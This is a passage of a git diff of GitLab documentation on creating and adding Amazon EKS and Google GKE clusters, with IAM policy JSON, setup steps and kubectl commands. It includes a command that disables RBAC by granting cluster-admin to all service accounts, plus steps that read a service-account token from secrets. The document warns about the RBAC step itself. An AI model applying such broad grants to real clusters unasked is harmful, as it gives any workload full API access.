cluster](#existing-eks-cluster): - - An Amazon EKS cluster with worker nodes properly configured. - - `kubectl` [installed and configured](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html#get-started-kubectl) - for access to the EKS cluster. +## Add an existing EKS cluster -### Additional requirements for self-managed instances **(FREE SELF)** +If you already have an EKS cluster and want to integrate it with GitLab, +see how to [add an existing cluster](add_existing_cluster.md). -If you are using a self-managed GitLab instance, GitLab must first be configured with a set of -Amazon credentials. These credentials are used to assume an Amazon IAM role provided by the user -creating the cluster. Create an IAM user and ensure it has permissions to assume the role(s) that -your users need to create EKS clusters. +## Create a new certificate-based EKS cluster -For example, the following policy document allows assuming a role whose name starts with -`gitlab-eks-` in account `123456789012`: +Prerequisites: -```json -{ - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Action": "sts:AssumeRole", - "Resource": "arn:aws:iam::123456789012:role/gitlab-eks-*" - } -} -``` +- An [Amazon Web Services](https://aws.amazon.com/) account. +- Permissions to manage IAM resources. -### Configure Amazon authentication +For instance-level clusters, see [additional requirements for self-managed instances](#additional-requirements-for-self-managed-instances). **(FREE SELF)** -To configure Amazon authentication in GitLab, generate an access key for the IAM user in the Amazon AWS console, and following the steps below. +To create new Kubernetes clusters for your project, group, or instance through the certificate-based method: -1. Navigate to **Admin Area > Settings > General** and expand the **Amazon EKS** section. -1. Check **Enable Amazon EKS integration**. -1. Enter your **Account ID**. -1. Depending on your configuration, enter your access key and ID: +1. [Define the access control (RBAC or ABAC) for your cluster](cluster_access.md). +1. [Create a cluster in GitLab](#create-a-new-eks-cluster-in-gitlab). +1. [Prepare the cluster in Amazon](#prepare-the-cluster-in-amazon). +1. [Configure your cluster's data in GitLab](#configure-your-clusters-data-in-gitlab). - - _GitLab 13.7 and later, and using an instance profile_: You may leave - **Access key ID** and **Secret access key** blank. - Read [Instance profiles](#instance-profiles) for more information. - - _All GitLab versions_: Enter your access key credentials into - **Access key ID** and **Secret access key**. +Further steps: -1. Click **Save changes**. +1. [Create a default Storage Class](#create-a-default-storage-class). +1. [Deploy the app to EKS](#deploy-the-app-to-eks). -#### Instance profiles +### Create a new EKS cluster in GitLab -> Introduced in [GitLab 13.7](https://gitlab.com/gitlab-org/gitlab/-/issues/291015). +To create a new EKS cluster: -You may leave `Access key ID` and `Secret access key` fields blank if -you are using an instance profile -[to pass an IAM role to an EC2 instance](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html). -Instance profiles dynamically retrieve temporary credentials from AWS when needed. - -## New EKS cluster - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22392) in GitLab 12.5. - -To create and add a new Kubernetes cluster to your project, group, or instance: - -1. Navigate to your: +1. Go to your: - Project's **Infrastructure > Kubernetes clusters** page, for a project-level cluster. - Group's **Kubernetes** page, for a group-level cluster. - - **Admin Area > Kubernetes**, for an instance-level cluster. -1. Click **Integrate with a cluster certificate**. + - **Menu >** **{admin}** **Admin > Kubernetes**, for an instance-level cluster. +1. Select **Integrate with a cluster certificate**. 1. Under the **Create new cluster** tab, click **Amazon EKS** to display an `Account ID` and `External ID` needed for later steps. 1. In the [IAM Management Console](https://console.aws.amazon.com/iam/home), create an IAM policy: 1. From the left panel, select **Policies**. - 1. Click **Create Policy**, which opens a new window. + 1. Select **Create Policy**, which opens a new window. 1. Select the **JSON** tab, and paste the following snippet in place of the existing content. These permissions give GitLab the ability to create resources, but not delete them: @@ -133,132 +105,163 @@ To create and add a new Kubernetes cluster to your project, group, or instance: } ``` - If an error is encountered during the creation process, changes will - not be rolled back and you must remove resources manually. You can do this by deleting - the relevant [CloudFormation stack](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/cfn-console-delete-stack.html) + If you get an error during this process, GitLab does not roll back the changes. You must remove resources manually. You can do this by deleting + the relevant [CloudFormation stack](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/cfn-console-delete-stack.html). 1. Click **Review policy**. 1. Enter a suitable name for this policy, and click **Create Policy**. You can now close this window. -1. In the [IAM Management Console](https://console.aws.amazon.com/iam/home), create an **EKS IAM role** following the [Amazon EKS cluster IAM role instructions](https://docs.aws.amazon.com/eks/latest/userguide/service_IAM_role.html). This role should exist so that Kubernetes clusters managed by Amazon EKS can make calls to other AWS services on your behalf to manage the resources that you use with the service. - In addition to the policies that guide suggests, you must also include the `AmazonEKSClusterPolicy` - policy for this role in order for GitLab to manage the EKS cluster correctly. -1. In the [IAM Management Console](https://console.aws.amazon.com/iam/home), create another IAM role which will be used by GitLab to authenticate with AWS. Follow these steps to create it: - 1. On the AWS IAM console, select **Roles** from the left panel. - 1. Click **Create role**. - 1. Under `Select type of trusted entity`, select **Another AWS account**. - 1. Enter the Account ID from GitLab into the `Account ID` field. - 1. Check **Require external ID**. - 1. Enter the External ID from GitLab into the `External ID` field. - 1. Click **Next: Permissions**, and select the policy you just created. - 1. Click **Next: Tags**, and optionally enter any tags you wish to associate with this role. - 1. Click **Next: Review**. - 1. Enter a role name and optional description into the fields provided. - 1. Click **Create role**, the new role name displays at the top. Click on its name and copy the `Role ARN` from the newly created role. -1. In GitLab, enter the copied role ARN into the `Role ARN` field. +### Prepare the cluster in Amazon + +1. [Create an **EKS IAM role** for your cluster](#create-an-eks-iam-role-for-your-cluster) (**role A**). +1. [Create **another EKS IAM role** for GitLab authentication with Amazon](#create-another-eks-iam-role-for-gitlab-authentication-with-amazon) (**role B**). + +#### Create an EKS IAM role for your cluster + +In the [IAM Management Console](https://console.aws.amazon.com/iam/home), +create an **EKS IAM role** (**role A**) following the [Amazon EKS cluster IAM role instructions](https://docs.aws.amazon.com/eks/latest/userguide/service_IAM_role.html). +This role is necessary so that Kubernetes clusters managed by Amazon EKS can make calls to other AWS +services on your behalf to manage the resources that you use with the service. + +For GitLab to manage the EKS cluster correctly, you must include `AmazonEKSClusterPolicy` in +addition to the policies the guide suggests. + +#### Create another EKS IAM role for GitLab authentication with Amazon + +In the [IAM Management Console](https://console.aws.amazon.com/iam/home), +create another IAM role (**role B**) for GitLab authentication with AWS: + +1. On the AWS IAM console, select **Roles** from the left panel. +1. Click **Create role**. +1. Under **Select type of trusted entity**, select **Another AWS account**. +1. Enter the Account ID from GitLab into the **Account ID** field. +1. Check **Require external ID**. +1. Enter the External ID from GitLab into the **External ID** field. +1. Click **Next: Permissions**, and select the policy you just created. +1. Click **Next: Tags**, and optionally enter any tags you wish to associate with this role. +1. Click **Next: Review**. +1. Enter a role name and optional description into the fields provided. +1. Click **Create role**. The new role name displays at the top. Click on its name and copy the + `Role ARN` from the newly created role. + +### Configure your cluster's data in GitLab + +1. Back in GitLab, enter the copied role ARN into the **Role ARN** field. 1. In the **Cluster Region** field, enter the [region](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html) you plan to use for your new cluster. GitLab confirms you have access to this region when authenticating your role. -1. Click **Authenticate with AWS**. -1. Choose your cluster's settings: - - **Kubernetes cluster name** - The name you wish to give the cluster. - - **Environment scope** - The [associated environment](index.md#setting-the-environment-scope) to this cluster. - - **Kubernetes version** - The [Kubernetes version](index.md#supported-cluster-versions) to use. - - **Service role** - Select the **EKS IAM role** you created earlier to allow Amazon EKS - and the Kubernetes control plane to manage AWS resources on your behalf. - - NOTE: - This IAM role is _not_ the IAM role you created in the previous step. It should be - the one you created much earlier by following the - [Amazon EKS cluster IAM role](https://docs.aws.amazon.com/eks/latest/userguide/service_IAM_role.html) - guide. - - **Key pair name** - Select the [key pair](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-key-pairs.html) - that you can use to connect to your worker nodes if required. - - **VPC** - Select a [VPC](https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html) - to use for your EKS Cluster resources. - - **Subnets** - Choose the [subnets](https://docs.aws.amazon.com/vpc/latest/userguide/VPC_Subnets.html) - in your VPC where your worker nodes run. You must select at least two. - - **Security group** - Choose the [security group](https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html) - to apply to the EKS-managed Elastic Network Interfaces that are created in your worker node subnets. - - **Instance type** - The [instance type](https://aws.amazon.com/ec2/instance-types/) of your worker nodes. - - **Node count** - The number of worker nodes. - - **GitLab-managed cluster** - Leave this checked if you want GitLab to manage namespaces and service accounts for this cluster. - See the [Managed clusters section](index.md#gitlab-managed-clusters) for more information. -1. Finally, click the **Create Kubernetes cluster** button. +1. Select **Authenticate with AWS**. +1. Adjust your [cluster's settings](#cluster-settings). +1. Select the **Create Kubernetes cluster** button. After about 10 minutes, your cluster is ready to go. NOTE: -If you have [installed and configured](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html#get-started-kubectl) `kubectl` and you would like to manage your cluster with it, you must add your AWS external ID in the AWS configuration. For more information on how to configure AWS CLI, see [using an IAM role in the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-xaccount). - -### Cluster creation flow - -The following sequence illustrates how GitLab works with AWS to create an EKS cluster: - -```mermaid -sequenceDiagram - autonumber - participant G as GitLab - participant A as AWS - participant E as EKS cluster - alt static credentials - G->>G: Load AWS Access and secret key - end - alt IAM instance profile - G->>A: Fetch temporary credentials - A->>G: Temporary access credentials - end - G->>A: AssumeRole: EKS Provision Role - A->>A: Check account, external IDs - A->>A: Check permissions - A->>G: New access credentials - note over G: user selects EKS cluster options - note over G,A: Use Service Role credentials - G->>A: CreateStack (CloudFormation) - A->>G: Received - G->>G: Wait 5 minutes - loop Poll for cluster creation - G->>A: DescribeStacks - A->>G: CREATE_IN_PROGRESS - end - note over G,E: EKS Cluster Created - G->>A: DescribeStacks - A->>G: CREATE_COMPLETE - G->>E: kubectl create role (service account) - E->>G: OK +If you have [installed and configured](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html#get-started-kubectl) `kubectl` and you would like to manage your cluster with it, you must add your AWS external ID in the AWS configuration. For more information on how to configure AWS CLI, see [using an IAM role in the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-xaccount). + +#### Cluster settings + +When you create a new cluster, you have the following settings: + +| Setting | Description | +| ----------------------- |------------ | +| Kubernetes cluster name | Your cluster's name. | +| Environment scope | The [associated environment](multiple_kubernetes_clusters.md#setting-the-environment-scope). | +| Service role | The **EKS IAM role** (**role A**). | +| Kubernetes version | The [Kubernetes version](index.md#supported-cluster-versions) for your cluster. | +| Key pair name | The [key pair](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-key-pairs.html) that you can use to connect to your worker nodes. | +| VPC | The [VPC](https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html) to use for your EKS Cluster resources. | +| Subnets | The [subnets](https://docs.aws.amazon.com/vpc/latest/userguide/VPC_Subnets.html) in your VPC where your worker nodes run. Two are required. | +| Security group | The [security group](https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html) to apply to the EKS-managed Elastic Network Interfaces that are created in your worker node subnets. | +| Instance type | The [instance type](https://aws.amazon.com/ec2/instance-types/) of your worker nodes. | +| Node count | The number of worker nodes. | +| GitLab-managed cluster | Check if you want GitLab to manage namespaces and service accounts for this cluster. | + +## Create a default Storage Class + +Amazon EKS doesn't have a default Storage Class out of the box, which means +requests for persistent volumes are not automatically fulfilled. As part +of Auto DevOps, the deployed PostgreSQL instance requests persistent storage, +and without a default storage class it cannot start. + +If a default Storage Class doesn't already exist and is desired, follow Amazon's +[guide on storage classes](https://docs.aws.amazon.com/eks/latest/userguide/storage-classes.html) +to create one. + +Alternatively, disable PostgreSQL by setting the project variable +[`POSTGRES_ENABLED`](../../../topics/autodevops/customize.md#cicd-variables) to `false`. + +## Deploy the app to EKS + +With RBAC disabled and services deployed, +[Auto DevOps](../../../topics/autodevops/index.md) can now be leveraged +to build, test, and deploy the app. + +[Enable Auto DevOps](../../../topics/autodevops/index.md#at-the-project-level) +if not already enabled. If a wildcard DNS entry was created resolving to the +Load Balancer, enter it in the `domain` field under the Auto DevOps settings. +Otherwise, the deployed app isn't externally available outside of the cluster. + + + +GitLab creates a new pipeline, which begins to build, test, and deploy the app. + +After the pipeline has finished, your app runs in EKS, and is available +to users. Click on **CI/CD > Environments**. + + + +GitLab displays a list of the environments and their deploy status, as well as +options to browse to the app, view monitoring metrics, and even access a shell +on the running pod. + +## Additional requirements for self-managed instances **(FREE SELF)** + +If you are using a self-managed GitLab instance, you need to configure +Amazon credentials. GitLab uses these credentials to assume an Amazon IAM role to create your cluster. + +Create an IAM user and ensure it has permissions to assume the role(s) that +your users need to create EKS clusters. + +For example, the following policy document allows assuming a role whose name starts with +`gitlab-eks-` in account `123456789012`: + +```json +{ + "Version": "2012-10-17", + "Statement": { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Resource": "arn:aws:iam::123456789012:role/gitlab-eks-*" + } +} ``` -First, GitLab must obtain an initial set of credentials to communicate with the AWS API. -These credentials can be retrieved in one of two ways: +### Configure Amazon authentication + +To configure Amazon authentication in GitLab, generate an access key for the +IAM user in the Amazon AWS console, and follow these steps: -- Statically through the [Configure Amazon authentication](#configure-amazon-authentication). -- Dynamically via an IAM instance profile ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/291015) in GitLab 13.7). +1. In GitLab, on the top bar, select **Menu >** **{admin}** **Admin > Settings > General** and expand the **Amazon EKS** section. +1. Check **Enable Amazon EKS integration**. +1. Enter your **Account ID**. +1. Enter your [access key and ID](#eks-access-key-and-id). +1. Click **Save changes**. -After GitLab retrieves the AWS credentials, it makes an -[AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) -API call to obtain credentials for the Provision Role. AWS confirms -the request has the correct account ID, external ID, and permissions. +#### EKS access key and ID -If the request is valid, AWS returns a new set of temporary credentials GitLab -uses to load the **Create cluster** options page. +> Instance profiles were [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/291015) in GitLab 13.7. -On the **Create cluster** page, the user must select a **Service Role**, which is -the IAM role that is actually used to create the cluster, and other options -such as the Kubernetes cluster name, Kubernetes version, and region. -After the user clicks the **Create Kubernetes cluster** button, GitLab -submits a CloudFormation API request to create an EKS cluster with the given parameters -from the user. GitLab waits 5 minutes before checking whether the cluster was created, -and polls once a minute for up to 30 minutes. +If you're using GitLab 13.7 or later, you can use instance profiles to +dynamically retrieve temporary credentials from AWS when needed. +In this case, leave the `Access key ID` and `Secret access key` fields blank +and [pass an IAM role to an EC2 instance](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html). -After GitLab receives a `CREATE_COMPLETE` message from AWS, GitLab talks -to the EKS cluster to create a Kubernetes service account with `cluster-admin` -privileges, and updates its internal database to reflect the newly-created -Kubernetes cluster. From this point forward, GitLab uses this service account to -interact with the cluster. +Otherwise, enter your access key credentials into **Access key ID** and **Secret access key**. -### Troubleshooting creating a new cluster +## Troubleshooting The following errors are commonly encountered when creating a new cluster. -#### Validation failed: Role ARN must be a valid Amazon Resource Name +### Validation failed: Role ARN must be a valid Amazon Resource Name Check that the `Provision Role ARN` is correct. An example of a valid ARN: @@ -266,7 +269,7 @@ Check that the `Provision Role ARN` is correct. An example of a valid ARN: arn:aws:iam::123456789012:role/gitlab-eks-provision' ``` -#### Access denied: User `arn:aws:iam::x` is not authorized to perform: `sts:AssumeRole` on resource: `arn:aws:iam::y` +### Access denied: User `arn:aws:iam::x` is not authorized to perform: `sts:AssumeRole` on resource: `arn:aws:iam::y` This error occurs when the credentials defined in the [Configure Amazon authentication](#configure-amazon-authentication) cannot assume the role defined by the @@ -280,7 +283,7 @@ Provision Role ARN. Check that:  -#### Could not load Security Groups for this VPC +### Could not load Security Groups for this VPC When populating options in the configuration form, GitLab returns this error because GitLab has successfully assumed your provided role, but the role has @@ -307,46 +310,3 @@ This role should be the role you created by following the [EKS cluster IAM role](https://docs.aws.amazon.com/eks/latest/userguide/service_IAM_role.html) guide. In addition to the policies that guide suggests, you must also include the `AmazonEKSClusterPolicy` policy for this role in order for GitLab to manage the EKS cluster correctly. - -## Existing EKS cluster - -For information on adding an existing EKS cluster, see -[Existing Kubernetes cluster](add_remove_clusters.md#existing-kubernetes-cluster). - -### Create a default Storage Class - -Amazon EKS doesn't have a default Storage Class out of the box, which means -requests for persistent volumes are not automatically fulfilled. As part -of Auto DevOps, the deployed PostgreSQL instance requests persistent storage, -and without a default storage class it cannot start. - -If a default Storage Class doesn't already exist and is desired, follow Amazon's -[guide on storage classes](https://docs.aws.amazon.com/eks/latest/userguide/storage-classes.html) -to create one. - -Alternatively, disable PostgreSQL by setting the project variable -[`POSTGRES_ENABLED`](../../../topics/autodevops/customize.md#cicd-variables) to `false`. - -### Deploy the app to EKS - -With RBAC disabled and services deployed, -[Auto DevOps](../../../topics/autodevops/index.md) can now be leveraged -to build, test, and deploy the app. - -[Enable Auto DevOps](../../../topics/autodevops/index.md#at-the-project-level) -if not already enabled. If a wildcard DNS entry was created resolving to the -Load Balancer, enter it in the `domain` field under the Auto DevOps settings. -Otherwise, the deployed app isn't externally available outside of the cluster. - - - -GitLab creates a new pipeline, which begins to build, test, and deploy the app. - -After the pipeline has finished, your app runs in EKS, and is available -to users. Click on **CI/CD > Environments**. - - - -GitLab displays a list of the environments and their deploy status, as well as -options to browse to the app, view monitoring metrics, and even access a shell -on the running pod. diff --git a/doc/user/project/clusters/add_existing_cluster.md b/doc/user/project/clusters/add_existing_cluster.md new file mode 100644 index 00000000000..efd480fa3ce --- /dev/null +++ b/doc/user/project/clusters/add_existing_cluster.md @@ -0,0 +1,224 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Add an existing Kubernetes cluster + +If you have an existing Kubernetes cluster, you can add it to a project, group, +or instance and benefit from the integration with GitLab. + +## Prerequisites + +See the prerequisites below to add existing clusters to GitLab. + +### All clusters + +To add any cluster to GitLab, you need: + +- Either a GitLab.com account or an account for a self-managed installation +running GitLab 12.5 or later. +- The Maintainer role for group-level and project-level clusters. +- Access to the Admin area for instance-level clusters. **(FREE SELF)** +- A Kubernetes cluster. +- Cluster administration access to the cluster with `kubectl`. + +You can host your cluster in [EKS](#eks-clusters), [GKE](#gke-clusters), +on premises, and with other providers. +To host them on premises and with other providers, +use either the EKS or GKE method to guide you through and enter your cluster's +settings manually. + +WARNING: +GitLab doesn't support `arm64` clusters. See the issue +[Helm Tiller fails to install on `arm64` cluster](https://gitlab.com/gitlab-org/gitlab/-/issues/29838) +for details. + +### EKS clusters + +To add an existing **EKS** cluster, you need: + +- An Amazon EKS cluster with worker nodes properly configured. +- `kubectl` [installed and configured](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html#get-started-kubectl) +for access to the EKS cluster. +- Ensure the token of the account has administrator privileges for the cluster. + +### GKE clusters + +To add an existing **GKE** cluster, you need: + +- The `container.clusterRoleBindings.create` permission to create a cluster +role binding. You can follow the [Google Cloud documentation](https://cloud.google.com/iam/docs/granting-changing-revoking-access) +to grant access. + +## How to add an existing cluster + +<!-- (REVISE - BREAK INTO SMALLER STEPS) --> + +To add a Kubernetes cluster to your project, group, or instance: + +1. Navigate to your: + 1. Project's **{cloud-gear}** **Infrastructure > Kubernetes clusters** page, for a project-level cluster. + 1. Group's **{cloud-gear}** **Kubernetes** page, for a group-level cluster. + 1. **Menu >** **{admin}** **Admin >** **{cloud-gear}** **Kubernetes** page, for an instance-level cluster. +1. Click **Add Kubernetes cluster**. +1. Click the **Add existing cluster** tab and fill in the details: + 1. **Kubernetes cluster name** (required) - The name you wish to give the cluster. + 1. **Environment scope** (required) - The + [associated environment](multiple_kubernetes_clusters.md#setting-the-environment-scope) to this cluster. + 1. **API URL** (required) - + It's the URL that GitLab uses to access the Kubernetes API. Kubernetes + exposes several APIs, we want the "base" URL that is common to all of them. + For example, `https://kubernetes.example.com` rather than `https://kubernetes.example.com/api/v1`. + + Get the API URL by running this command: + + ```shell + kubectl cluster-info | grep -E 'Kubernetes master|Kubernetes control plane' | awk '/http/ {print $NF}' + ``` + + 1. **CA certificate** (required) - A valid Kubernetes certificate is needed to authenticate to the cluster. We use the certificate created by default. + 1. List the secrets with `kubectl get secrets`, and one should be named similar to + `default-token-xxxxx`. Copy that token name for use below. + 1. Get the certificate by running this command: + + ```shell + kubectl get secret <secret name> -o jsonpath="{['data']['ca\.crt']}" | base64 --decode + ``` + + If the command returns the entire certificate chain, you must copy the Root CA + certificate and any intermediate certificates at the bottom of the chain. + A chain file has following structure: + + ```plaintext + -----BEGIN MY CERTIFICATE----- + -----END MY CERTIFICATE----- + -----BEGIN INTERMEDIATE CERTIFICATE----- + -----END INTERMEDIATE CERTIFICATE----- + -----BEGIN INTERMEDIATE CERTIFICATE----- + -----END INTERMEDIATE CERTIFICATE----- + -----BEGIN ROOT CERTIFICATE----- + -----END ROOT CERTIFICATE----- + ``` + + 1. **Token** - + GitLab authenticates against Kubernetes using service tokens, which are + scoped to a particular `namespace`. + **The token used should belong to a service account with + [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) + privileges.** To create this service account: + 1. Create a file called `gitlab-admin-service-account.yaml` with contents: + + ```yaml + apiVersion: v1 + kind: ServiceAccount + metadata: + name: gitlab + namespace: kube-system + --- + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRoleBinding + metadata: + name: gitlab-admin + roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: cluster-admin + subjects: + - kind: ServiceAccount + name: gitlab + namespace: kube-system + ``` + + 1. Apply the service account and cluster role binding to your cluster: + + ```shell + kubectl apply -f gitlab-admin-service-account.yaml + ``` + + You need the `container.clusterRoleBindings.create` permission + to create cluster-level roles. If you do not have this permission, + you can alternatively enable Basic Authentication and then run the + `kubectl apply` command as an administrator: + + ```shell + kubectl apply -f gitlab-admin-service-account.yaml --username=admin --password=<password> + ``` + + NOTE: + Basic Authentication can be turned on and the password credentials + can be obtained using the Google Cloud Console. + + Output: + + ```shell + serviceaccount "gitlab" created + clusterrolebinding "gitlab-admin" created + ``` + + 1. Retrieve the token for the `gitlab` service account: + + ```shell + kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep gitlab | awk '{print $1}') + ``` + + Copy the `<authentication_token>` value from the output: + + ```plaintext + Name: gitlab-token-b5zv4 + Namespace: kube-system + Labels: <none> + Annotations: kubernetes.io/service-account.name=gitlab + kubernetes.io/service-account.uid=bcfe66ac-39be-11e8-97e8-026dce96b6e8 + + Type: kubernetes.io/service-account-token + + Data + ==== + ca.crt: 1025 bytes + namespace: 11 bytes + token: <authentication_token> + ``` + + 1. **GitLab-managed cluster** - Leave this checked if you want GitLab to manage namespaces and service accounts for this cluster. + See the [Managed clusters section](index.md#gitlab-managed-clusters) for more information. + 1. **Project namespace** (optional) - You don't have to fill this in. By leaving + it blank, GitLab creates one for you. Also: + - Each project should have a unique namespace. + - The project namespace is not necessarily the namespace of the secret, if + you're using a secret with broader permissions, like the secret from `default`. + - You should **not** use `default` as the project namespace. + - If you or someone created a secret specifically for the project, usually + with limited permissions, the secret's namespace and project namespace may + be the same. + +1. Select the **Add Kubernetes cluster** button. + +After about 10 minutes, your cluster is ready. + +## Disable Role-Based Access Control (RBAC) (optional) + +When connecting a cluster via GitLab integration, you may specify whether the +cluster is RBAC-enabled or not. This affects how GitLab interacts with the +cluster for certain operations. If you did *not* check the **RBAC-enabled cluster** +checkbox at creation time, GitLab assumes RBAC is disabled for your cluster +when interacting with it. If so, you must disable RBAC on your cluster for the +integration to work properly. + + + +WARNING: +Disabling RBAC means that any application running in the cluster, +or user who can authenticate to the cluster, has full API access. This is a +[security concern](index.md#security-implications), and may not be desirable. + +To effectively disable RBAC, global permissions can be applied granting full access: + +```shell +kubectl create clusterrolebinding permissive-binding \ + --clusterrole=cluster-admin \ + --user=admin \ + --user=kubelet \ + --group=system:serviceaccounts +``` diff --git a/doc/user/project/clusters/add_gke_clusters.md b/doc/user/project/clusters/add_gke_clusters.md index 9f0e5603785..a454b4dff99 100644 --- a/doc/user/project/clusters/add_gke_clusters.md +++ b/doc/user/project/clusters/add_gke_clusters.md @@ -4,7 +4,15 @@ group: Configure info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Adding GKE clusters **(FREE)** +# GKE clusters (DEPRECATED) **(FREE)** + +> - [Deprecated](https://gitlab.com/groups/gitlab-org/-/epics/6049) in GitLab 14.0. + +WARNING: +Use [Infrastrucure as Code](../../infrastructure/index.md) to create new clusters. The method described in this document is deprecated as of GitLab 14.0. + +Through GitLab, you can create new clusters and add existing clusters hosted on Amazon Elastic +Kubernetes Service (EKS). GitLab supports adding new and existing GKE clusters. @@ -19,7 +27,12 @@ requirements are met: take up to 10 minutes after you create a project. For more information see the ["Before you begin" section of the Kubernetes Engine docs](https://cloud.google.com/kubernetes-engine/docs/quickstart#before-you-begin). -## New GKE cluster +## Add an existing GKE cluster + +If you already have a GKE cluster and want to integrate it with GitLab, +see how to [add an existing cluster](add_existing_cluster.md). + +## Create new GKE cluster Starting from [GitLab 12.4](https://gitlab.com/gitlab-org/gitlab/-/issues/25925), all the GKE clusters provisioned by GitLab are [VPC-native](https://cloud.google.com/kubernetes-engine/docs/how-to/alias-ips). @@ -30,13 +43,13 @@ Note the following: at the instance level. If that's not the case, ask your GitLab administrator to enable it. On GitLab.com, this is enabled. - Starting from [GitLab 12.1](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/55902), all GKE clusters - created by GitLab are RBAC-enabled. Take a look at the [RBAC section](add_remove_clusters.md#rbac-cluster-resources) for + created by GitLab are RBAC-enabled. Take a look at the [RBAC section](cluster_access.md#rbac-cluster-resources) for more information. - Starting from [GitLab 12.5](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/18341), the cluster's pod address IP range is set to `/16` instead of the regular `/14`. `/16` is a CIDR notation. - GitLab requires basic authentication enabled and a client certificate issued for the cluster to - set up an [initial service account](add_remove_clusters.md#access-controls). In [GitLab versions + set up an [initial service account](cluster_access.md). In [GitLab versions 11.10 and later](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/58208), the cluster creation process explicitly requests GKE to create clusters with basic authentication enabled and a client certificate. @@ -49,14 +62,14 @@ To create and add a new Kubernetes cluster to your project, group, or instance: - Project's **{cloud-gear}** **Infrastructure > Kubernetes clusters** page, for a project-level cluster. - Group's **{cloud-gear}** **Kubernetes** page, for a group-level cluster. - - **Admin Area >** **{cloud-gear}** **Kubernetes** page, for an instance-level cluster. + - **Menu >** **{admin}** **Admin >** **{cloud-gear}** **Kubernetes** page, for an instance-level cluster. 1. Click **Integrate with a cluster certificate**. 1. Under the **Create new cluster** tab, click **Google GKE**. 1. Connect your Google account if you haven't done already by clicking the **Sign in with Google** button. 1. Choose your cluster's settings: - **Kubernetes cluster name** - The name you wish to give the cluster. - - **Environment scope** - The [associated environment](index.md#setting-the-environment-scope) to this cluster. + - **Environment scope** - The [associated environment](multiple_kubernetes_clusters.md#setting-the-environment-scope) to this cluster. - **Google Cloud Platform project** - Choose the project you created in your GCP console to host the Kubernetes cluster. Learn more about [Google Cloud Platform projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects). @@ -68,7 +81,7 @@ To create and add a new Kubernetes cluster to your project, group, or instance: - **Enable Cloud Run for Anthos** - Check this if you want to use Cloud Run for Anthos for this cluster. See the [Cloud Run for Anthos section](#cloud-run-for-anthos) for more information. - **GitLab-managed cluster** - Leave this checked if you want GitLab to manage namespaces and service accounts for this cluster. - See the [Managed clusters section](index.md#gitlab-managed-clusters) for more information. + See the [Managed clusters section](gitlab_managed_clusters.md) for more information. 1. Finally, click the **Create Kubernetes cluster** button. After a couple of minutes, your cluster is ready. @@ -81,8 +94,3 @@ You can choose to use Cloud Run for Anthos in place of installing Knative and Is separately after the cluster has been created. This means that Cloud Run (Knative), Istio, and HTTP Load Balancing are enabled on the cluster from the start, and cannot be installed or uninstalled. - -## Existing GKE cluster - -For information on adding an existing GKE cluster, see -[Existing Kubernetes cluster](add_remove_clusters.md#existing-kubernetes-cluster). diff --git a/doc/user/project/clusters/add_remove_clusters.md b/doc/user/project/clusters/add_remove_clusters.md index 2ecbc4a2ff5..6cada5648cb 100644 --- a/doc/user/project/clusters/add_remove_clusters.md +++ b/doc/user/project/clusters/add_remove_clusters.md @@ -4,28 +4,16 @@ group: Configure info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Add a cluster using cluster certificates **(FREE)** +# Add a cluster using cluster certificates (DEPRECATED) **(FREE)** -> [Deprecated](https://gitlab.com/groups/gitlab-org/-/epics/6049) in GitLab 14.0. +> [Deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/327908) in GitLab 14.0. WARNING: Creating a new cluster or adding an existing cluster to GitLab through the certificate-based method is deprecated and no longer recommended. Kubernetes cluster, similar to any other -infrastructure, should be created, updated, and maintained using [Infrastructure as Code](../../infrastructure/index.md). +infrastructure, should be created, updated, maintained using [Infrastructure as Code](../../infrastructure/index.md). GitLab is developing a built-in capability to create clusters with Terraform. -You can follow along in this [epic](https://gitlab.com/groups/gitlab-org/-/epics/6049). - -GitLab offers integrated cluster creation for the following Kubernetes providers: - -- Google Kubernetes Engine (GKE). -- Amazon Elastic Kubernetes Service (EKS). - -GitLab can also integrate with any standard Kubernetes provider, either on-premise or hosted. - -NOTE: -Watch the webcast [Scalable app deployment with GitLab and Google Cloud Platform](https://about.gitlab.com/webcast/scalable-app-deploy/) -and learn how to spin up a Kubernetes cluster 